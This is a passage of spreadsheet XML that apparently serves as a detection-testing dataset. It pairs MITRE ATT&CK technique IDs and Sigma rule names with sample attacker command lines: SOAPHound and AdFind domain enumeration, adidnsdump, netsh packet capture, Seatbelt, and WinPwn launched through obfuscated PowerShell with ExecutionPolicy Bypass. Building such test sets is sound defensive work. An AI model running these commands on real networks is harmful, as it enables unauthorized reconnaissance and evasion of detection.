      <c r="I1616" s="43" t="n"/>
      <c r="J1616" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1616" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1617" ht="15.75" customHeight="1" s="42">
      <c r="A1617" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B1617" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_soaphound_execution</t>
        </is>
      </c>
      <c r="C1617" s="43" t="inlineStr">
        <is>
          <t>HackTool - SOAPHound Execution</t>
        </is>
      </c>
      <c r="D1617" s="43" t="inlineStr">
        <is>
          <t>e92a4287-e072-4a40-9739-370c106bb750</t>
        </is>
      </c>
      <c r="E1617" s="43" t="inlineStr">
        <is>
          <t>"C:\AtomicRedTeam\atomics\T1059.001\bin\SOAPHound.exe" --buildcache --cachefilename c:\temp\cache.txt</t>
        </is>
      </c>
      <c r="F1617" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1617" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1617" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1617" s="43" t="n"/>
      <c r="J1617" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1617" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1618" ht="15.75" customHeight="1" s="42">
      <c r="A1618" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B1618" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_soaphound_execution</t>
        </is>
      </c>
      <c r="C1618" s="43" t="inlineStr">
        <is>
          <t>HackTool - SOAPHound Execution</t>
        </is>
      </c>
      <c r="D1618" s="43" t="inlineStr">
        <is>
          <t>e92a4287-e072-4a40-9739-370c106bb750</t>
        </is>
      </c>
      <c r="E1618" s="43" t="inlineStr">
        <is>
          <t>"C:\AtomicRedTeam\atomics\T1059.001\bin\SOAPHound.exe" --bhdump -o c:\temp\test2 --cachefilename c:\temp\cache.txt</t>
        </is>
      </c>
      <c r="F1618" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1618" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1618" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1618" s="43" t="n"/>
      <c r="J1618" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1618" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1619" ht="15.75" customHeight="1" s="42">
      <c r="A1619" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B1619" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_nslookup_domain_discovery</t>
        </is>
      </c>
      <c r="C1619" s="43" t="inlineStr">
        <is>
          <t>Network Reconnaissance Activity</t>
        </is>
      </c>
      <c r="D1619" s="43" t="inlineStr">
        <is>
          <t>e6313acd-208c-44fc-a0ff-db85d572e90e</t>
        </is>
      </c>
      <c r="E1619" s="43" t="inlineStr">
        <is>
          <t>nslookup -querytype:ALL -timeout=10 _ldap._tcp.dc._msdcs.DomainName</t>
        </is>
      </c>
      <c r="F1619" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1619" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1619" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1619" s="43" t="n"/>
      <c r="J1619" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1619" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1620" ht="15.75" customHeight="1" s="42">
      <c r="A1620" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B1620" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_nslookup_domain_discovery</t>
        </is>
      </c>
      <c r="C1620" s="43" t="inlineStr">
        <is>
          <t>Network Reconnaissance Activity</t>
        </is>
      </c>
      <c r="D1620" s="43" t="inlineStr">
        <is>
          <t>e6313acd-208c-44fc-a0ff-db85d572e90e</t>
        </is>
      </c>
      <c r="E1620" s="43" t="inlineStr">
        <is>
          <t>nslookup -querytype=ALL --timeout=10 _ldap._tcp.dc._msdcs.DomainName</t>
        </is>
      </c>
      <c r="F1620" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1620" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1620" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1620" s="43" t="n"/>
      <c r="J1620" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1620" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1621" ht="15.75" customHeight="1" s="42">
      <c r="A1621" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B1621" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1621" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1621" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1621" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "&amp; ("Win" + "Pwn.ps1") -noninteractive"</t>
        </is>
      </c>
      <c r="F1621" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1621" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1621" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1621" s="43" t="n"/>
      <c r="J1621" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1621" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1622" ht="15.75" customHeight="1" s="42">
      <c r="A1622" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B1622" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1622" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1622" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1622" s="43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F1622" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1622" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1622" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1622" s="43" t="n"/>
      <c r="J1622" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1622" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1623" ht="15.75" customHeight="1" s="42">
      <c r="A1623" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B1623" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1623" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1623" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1623" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -Command "&amp; ("W`inP`wn.ps1" -replace '`', '') -noninteractive"</t>
        </is>
      </c>
      <c r="F1623" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1623" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1623" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1623" s="43" t="n"/>
      <c r="J1623" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1623" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1624" ht="15.75" customHeight="1" s="42">
      <c r="A1624" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B1624" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1624" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1624" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1624" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "&amp; (Resolve-Path (".\Win" + "Pwn.ps1")) -noninteractive"</t>
        </is>
      </c>
      <c r="F1624" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1624" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1624" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1624" s="43" t="n"/>
      <c r="J1624" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1624" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1625" ht="15.75" customHeight="1" s="42">
      <c r="A1625" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B1625" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1625" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1625" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1625" s="43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F1625" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1625" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1625" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1625" s="43" t="n"/>
      <c r="J1625" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1625" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1626" ht="15.75" customHeight="1" s="42">
      <c r="A1626" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B1626" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_advanced_ip_scanner</t>
        </is>
      </c>
      <c r="C1626" s="43" t="inlineStr">
        <is>
          <t>PUA - Advanced IP Scanner Execution</t>
        </is>
      </c>
      <c r="D1626" s="43" t="inlineStr">
        <is>
          <t>bef37fa2-f205-4a7b-b484-0759bfd5f86f</t>
        </is>
      </c>
      <c r="E1626" s="43" t="inlineStr">
        <is>
          <t>advanced_ip_scanner.exe</t>
        </is>
      </c>
      <c r="F1626" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1626" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1626" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1626" s="43" t="n"/>
      <c r="J1626" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1626" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1627" ht="15.75" customHeight="1" s="42">
      <c r="A1627" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B1627" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_advanced_port_scanner</t>
        </is>
      </c>
      <c r="C1627" s="43" t="inlineStr">
        <is>
          <t>PUA - Advanced Port Scanner Execution</t>
        </is>
      </c>
      <c r="D1627" s="43" t="inlineStr">
        <is>
          <t>54773c5f-f1cc-4703-9126-2f797d96a69d</t>
        </is>
      </c>
      <c r="E1627" s="43" t="inlineStr">
        <is>
          <t>"C:\\Users\\SWACHC~1\\AppData\\Local\\Temp\\2\\Advanced Port Scanner 2\\advanced_port_scanner.exe" /portable C:/Users/SwachchhandaP/Downloads/ /lng:en_us</t>
        </is>
      </c>
      <c r="F1627" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1627" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1627" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1627" s="43" t="n"/>
      <c r="J1627" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1627" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1628" ht="15.75" customHeight="1" s="42">
      <c r="A1628" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B1628" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_advanced_port_scanner</t>
        </is>
      </c>
      <c r="C1628" s="43" t="inlineStr">
        <is>
          <t>PUA - Advanced Port Scanner Execution</t>
        </is>
      </c>
      <c r="D1628" s="43" t="inlineStr">
        <is>
          <t>54773c5f-f1cc-4703-9126-2f797d96a69d</t>
        </is>
      </c>
      <c r="E1628" s="43" t="inlineStr">
        <is>
          <t>"C:\\Users\\SWACHC~1\\AppData\\Local\\Temp\\2\\Advanced Port Scanner 2\\advanced_port_scanner.exe" /portable C:/Users/SwachchhandaP/Downloads/ /lng en_us</t>
        </is>
      </c>
      <c r="F1628" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1628" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1628" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1628" s="43" t="n"/>
      <c r="J1628" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1628" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1629" ht="15.75" customHeight="1" s="42">
      <c r="A1629" s="43" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B1629" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_adfind_susp_usage</t>
        </is>
      </c>
      <c r="C1629" s="43" t="inlineStr">
        <is>
          <t>PUA - AdFind Suspicious Execution</t>
        </is>
      </c>
      <c r="D1629" s="43" t="inlineStr">
        <is>
          <t>9a132afa-654e-11eb-ae93-0242ac130002</t>
        </is>
      </c>
      <c r="E1629" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c C:\AtomicRedTeam\atomics\..\ExternalPayloads\AdFind.exe -f "(objectcategory=subnet)"</t>
        </is>
      </c>
      <c r="F1629" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1629" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1629" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1629" s="43" t="n"/>
      <c r="J1629" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1629" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1630" ht="15.75" customHeight="1" s="42">
      <c r="A1630" s="43" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B1630" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_adfind_susp_usage</t>
        </is>
      </c>
      <c r="C1630" s="43" t="inlineStr">
        <is>
          <t>PUA - AdFind Suspicious Execution</t>
        </is>
      </c>
      <c r="D1630" s="43" t="inlineStr">
        <is>
          <t>9a132afa-654e-11eb-ae93-0242ac130002</t>
        </is>
      </c>
      <c r="E1630" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c C:\AtomicRedTeam\atomics\..\ExternalPayloads\AdFind.exe -f (objectcategory=subnet)</t>
        </is>
      </c>
      <c r="F1630" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1630" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1630" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1630" s="43" t="n"/>
      <c r="J1630" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1630" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1631" ht="15.75" customHeight="1" s="42">
      <c r="A1631" s="43" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B1631" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_adfind_susp_usage</t>
        </is>
      </c>
      <c r="C1631" s="43" t="inlineStr">
        <is>
          <t>PUA - AdFind Suspicious Execution</t>
        </is>
      </c>
      <c r="D1631" s="43" t="inlineStr">
        <is>
          <t>9a132afa-654e-11eb-ae93-0242ac130002</t>
        </is>
      </c>
      <c r="E1631" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c C:\AtomicRedTeam\atomics\..\ExternalPayloads\AdFind.exe -f (objectcategory=\"subnet\")</t>
        </is>
      </c>
      <c r="F1631" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1631" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1631" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1631" s="43" t="n"/>
      <c r="J1631" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1631" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1632" ht="15.75" customHeight="1" s="42">
      <c r="A1632" s="43" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B1632" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_adfind_susp_usage</t>
        </is>
      </c>
      <c r="C1632" s="43" t="inlineStr">
        <is>
          <t>PUA - AdFind Suspicious Execution</t>
        </is>
      </c>
      <c r="D1632" s="43" t="inlineStr">
        <is>
          <t>9a132afa-654e-11eb-ae93-0242ac130002</t>
        </is>
      </c>
      <c r="E1632" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c C:\AtomicRedTeam\atomics\..\ExternalPayloads\AdFind.exe -f (objectcategory=subnet) -accepteula</t>
        </is>
      </c>
      <c r="F1632" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1632" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1632" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1632" s="43" t="n"/>
      <c r="J1632" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1632" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1633" ht="15.75" customHeight="1" s="42">
      <c r="A1633" s="43" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B1633" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_adfind_susp_usage</t>
        </is>
      </c>
      <c r="C1633" s="43" t="inlineStr">
        <is>
          <t>PUA - AdFind Suspicious Execution</t>
        </is>
      </c>
      <c r="D1633" s="43" t="inlineStr">
        <is>
          <t>9a132afa-654e-11eb-ae93-0242ac130002</t>
        </is>
      </c>
      <c r="E1633" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c C:\AtomicRedTeam\atomics\..\ExternalPayloads\AdFind.exe -f (objectcategory=subnet) -gcb</t>
        </is>
      </c>
      <c r="F1633" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1633" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1633" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1633" s="43" t="n"/>
      <c r="J1633" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1633" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1634" ht="15.75" customHeight="1" s="42">
      <c r="A1634" s="43" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B1634" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_adfind_susp_usage</t>
        </is>
      </c>
      <c r="C1634" s="43" t="inlineStr">
        <is>
          <t>PUA - AdFind Suspicious Execution</t>
        </is>
      </c>
      <c r="D1634" s="43" t="inlineStr">
        <is>
          <t>9a132afa-654e-11eb-ae93-0242ac130002</t>
        </is>
      </c>
      <c r="E1634" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c C:\AtomicRedTeam\atomics\..\ExternalPayloads\AdFind.exe -f (objectcategory=subnet) -sc trustdmp</t>
        </is>
      </c>
      <c r="F1634" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1634" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1634" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1634" s="43" t="n"/>
      <c r="J1634" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1634" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1635" ht="15.75" customHeight="1" s="42">
      <c r="A1635" s="43" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B1635" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_adfind_susp_usage</t>
        </is>
      </c>
      <c r="C1635" s="43" t="inlineStr">
        <is>
          <t>PUA - AdFind Suspicious Execution</t>
        </is>
      </c>
      <c r="D1635" s="43" t="inlineStr">
        <is>
          <t>9a132afa-654e-11eb-ae93-0242ac130002</t>
        </is>
      </c>
      <c r="E1635" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c C:\AtomicRedTeam\atomics\..\ExternalPayloads\AdFind.exe -f (objectcategory=subnet) -s:example.com</t>
        </is>
      </c>
      <c r="F1635" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1635" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1635" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1635" s="43" t="n"/>
      <c r="J1635" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1635" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1636" ht="15.75" customHeight="1" s="42">
      <c r="A1636" s="43" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B1636" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_adfind_susp_usage</t>
        </is>
      </c>
      <c r="C1636" s="43" t="inlineStr">
        <is>
          <t>PUA - AdFind Suspicious Execution</t>
        </is>
      </c>
      <c r="D1636" s="43" t="inlineStr">
        <is>
          <t>9a132afa-654e-11eb-ae93-0242ac130002</t>
        </is>
      </c>
      <c r="E1636" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c C:\AtomicRedTeam\atomics\..\ExternalPayloads\AdFind.exe -f (objectcategory=subnet) -sc dclist</t>
        </is>
      </c>
      <c r="F1636" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1636" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1636" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1636" s="43" t="n"/>
      <c r="J1636" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1636" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1637" ht="15.75" customHeight="1" s="42">
      <c r="A1637" s="43" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B1637" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_python_adidnsdump</t>
        </is>
      </c>
      <c r="C1637" s="43" t="inlineStr">
        <is>
          <t>PUA - Adidnsdump Execution</t>
        </is>
      </c>
      <c r="D1637" s="43" t="inlineStr">
        <is>
          <t>26d3f0a2-f514-4a3f-a8a7-e7e48a8d9160</t>
        </is>
      </c>
      <c r="E1637" s="43" t="inlineStr">
        <is>
          <t>python.exe -m adidnsdump -u DOMAIN\User -p Password ldap://10.10.10.10</t>
        </is>
      </c>
      <c r="F1637" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1637" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1637" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1637" s="43" t="n"/>
      <c r="J1637" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1637" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1638" ht="15.75" customHeight="1" s="42">
      <c r="A1638" s="43" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B1638" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_python_adidnsdump</t>
        </is>
      </c>
      <c r="C1638" s="43" t="inlineStr">
        <is>
          <t>PUA - Adidnsdump Execution</t>
        </is>
      </c>
      <c r="D1638" s="43" t="inlineStr">
        <is>
          <t>26d3f0a2-f514-4a3f-a8a7-e7e48a8d9160</t>
        </is>
      </c>
      <c r="E1638" s="43" t="inlineStr">
        <is>
          <t>python.exe -m adidnsdump -u DOMAIN/User -p Password ldap://10.10.10.10</t>
        </is>
      </c>
      <c r="F1638" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1638" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1638" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1638" s="43" t="n"/>
      <c r="J1638" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1638" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1639" ht="15.75" customHeight="1" s="42">
      <c r="A1639" s="43" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B1639" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_adfind</t>
        </is>
      </c>
      <c r="C1639" s="43" t="inlineStr">
        <is>
          <t>Renamed AdFind Execution</t>
        </is>
      </c>
      <c r="D1639" s="43" t="inlineStr">
        <is>
          <t>df55196f-f105-44d3-a675-e9dfb6cc2f2b</t>
        </is>
      </c>
      <c r="E1639" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\Tools\AdFind.exe" -f (objectcategory=computer) &gt; NUL</t>
        </is>
      </c>
      <c r="F1639" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1639" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1639" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1639" s="43" t="n"/>
      <c r="J1639" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1639" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1640" ht="15.75" customHeight="1" s="42">
      <c r="A1640" s="43" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B1640" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_adfind</t>
        </is>
      </c>
      <c r="C1640" s="43" t="inlineStr">
        <is>
          <t>Renamed AdFind Execution</t>
        </is>
      </c>
      <c r="D1640" s="43" t="inlineStr">
        <is>
          <t>df55196f-f105-44d3-a675-e9dfb6cc2f2b</t>
        </is>
      </c>
      <c r="E1640" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; 'C:\Tools\AdFind.exe' -f (objectcategory=computer)"</t>
        </is>
      </c>
      <c r="F1640" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1640" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1640" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1640" s="43" t="n"/>
      <c r="J1640" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1640" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1641" ht="15.75" customHeight="1" s="42">
      <c r="A1641" s="43" t="inlineStr">
        <is>
          <t>t1040</t>
        </is>
      </c>
      <c r="B1641" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_packet_capture</t>
        </is>
      </c>
      <c r="C1641" s="43" t="inlineStr">
        <is>
          <t>New Network Trace Capture Started Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D1641" s="43" t="inlineStr">
        <is>
          <t>d3c3861d-c504-4c77-ba55-224ba82d0118</t>
        </is>
      </c>
      <c r="E1641" s="43" t="inlineStr">
        <is>
          <t>netsh trace start capture=yes tracefile=C:\Users\thaim\AppData\Local\Temp\trace.etl maxsize=10</t>
        </is>
      </c>
      <c r="F1641" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1641" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1641" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1641" s="43" t="n"/>
      <c r="J1641" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1641" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1642" ht="15.75" customHeight="1" s="42">
      <c r="A1642" s="43" t="inlineStr">
        <is>
          <t>t1526</t>
        </is>
      </c>
      <c r="B1642" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_seatbelt</t>
        </is>
      </c>
      <c r="C1642" s="43" t="inlineStr">
        <is>
          <t>PUA - Seatbelt Execution</t>
        </is>
      </c>
      <c r="D1642" s="43" t="inlineStr">
        <is>
          <t>38646daa-e78f-4ace-9de0-55547b2d30da</t>
        </is>
      </c>
      <c r="E1642" s="43" t="inlineStr">
        <is>
          <t>Seatbelt.exe -group=\"all\" -outputfile=\"C:\\output.txt\"</t>
        </is>
      </c>
      <c r="F1642" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1642" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1642" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1642" s="43" t="n"/>
      <c r="J1642" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1642" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1643" ht="15.75" customHeight="1" s="42">
      <c r="A1643" s="43" t="inlineStr">
        <is>
          <t>t1526</t>
        </is>
      </c>
      <c r="B1643" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_seatbelt</t>
        </is>
      </c>
      <c r="C1643" s="43" t="inlineStr">
        <is>
          <t>PUA - Seatbelt Execution</t>
        </is>
      </c>
      <c r="D1643" s="43" t="inlineStr">
        <is>
          <t>38646daa-e78f-4ace-9de0-55547b2d30da</t>
        </is>
      </c>
      <c r="E1643" s="43" t="inlineStr">
        <is>
          <t>Seatbelt.exe InterestingFiles</t>
        </is>
      </c>
      <c r="F1643" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1643" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1643" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1643" s="43" t="n"/>
      <c r="J1643" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1643" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1644" ht="15.75" customHeight="1" s="42">
      <c r="A1644" s="43" t="inlineStr">
        <is>
          <t>t1526</t>
        </is>
      </c>
      <c r="B1644" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_seatbelt</t>
        </is>
      </c>
      <c r="C1644" s="43" t="inlineStr">
        <is>
          <t>PUA - Seatbelt Execution</t>
        </is>
      </c>
      <c r="D1644" s="43" t="inlineStr">
        <is>
          <t>38646daa-e78f-4ace-9de0-55547b2d30da</t>
        </is>
      </c>
